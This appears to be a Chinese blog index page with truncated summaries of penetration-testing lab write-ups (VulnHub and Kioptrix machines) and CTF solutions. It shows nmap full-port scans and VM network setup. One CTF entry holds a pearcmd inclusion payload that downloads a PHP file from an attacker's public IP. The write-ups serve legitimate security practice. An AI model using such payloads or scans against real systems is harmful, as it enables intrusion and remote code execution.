摘要:
靶机 192.168.1.148 kali 192.168.1.128 sudo nmap --min-rate 10000 -p- 192.168.1.148 [sudo] wyh 的密码: Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 阅读全文
摘要:
靶机 192.168.1.144 kali 192.168.1.128 vulnhub上该靶机为.vbox文件,需将其导入VMBox中再导出为.ova文件导入VMWare使用,注意导入成功后查看一下网络设置。 信息收集 nmap先扫一下 sudo nmap --min-rate 10000 -p- 阅读全文
摘要:
靶机IP:192.168.1.159 kaliIP:192.168.1.128 先用nmap看看情况 sudo nmap --min-rate 10000 -p- 192.168.1.159 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 阅读全文
摘要:
靶机IP 192.168.1.135 kaliIP 192.168.1.128 信息收集 sudo nmap --min-rate 10000 -p- 192.168.1.135 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 10:13 阅读全文
摘要:
这个靶机默认静态ip为10.10.10.100,所以不能使用VM NAT模式,将kali和靶机网络同时设置为仅主机模式,并在虚拟网络编辑器中设置仅主机模式网段为10.10.10.0。重新启动虚拟机,就可以发现可以扫描到靶机了。 kaliIP:10.10.10.128 靶机IP:10.10.10.10 阅读全文
摘要:
kali IP 192.168.1.128 靶机IP 192.168.1.132 本靶机需要在主机绑定host,要不然web页面加载不全。 扫描端口 ``` sudo nmap --min-rate 10000 -p- 192.168.1.132 Starting Nmap 7.94 ( https 阅读全文
摘要:
* misc11: 没有头绪,看了网上大佬的一些思路,受益匪浅,和大家分享下。 1.解压zip文件,用winhex打开misc11.png 2.判断文件格式是否篡改,检查png的文件头和文件尾,文件格式正常 PNG文件头(hex):89 50 4e 47 0d 0a 1a 0a PNG文件尾(hex 阅读全文
摘要:
* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload: http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php: `"; ?>` 上传成功后显示: ``` do 阅读全文
摘要:
kali IP 192.168.1.128 靶机IP 192.168.1.130 ``` sudo nmap --min-rate 10000 -p- 192.168.1.131 Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-23 17:17 阅读全文
摘要:
Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。 解决方式:每次下载好靶机先不导入VM,如果已经导入,需要“移除”靶机;然后通过修改靶机目录中的vm配置文件,删除所有ethernet0为首的行,之后,导入VM中,重新添加网 阅读全文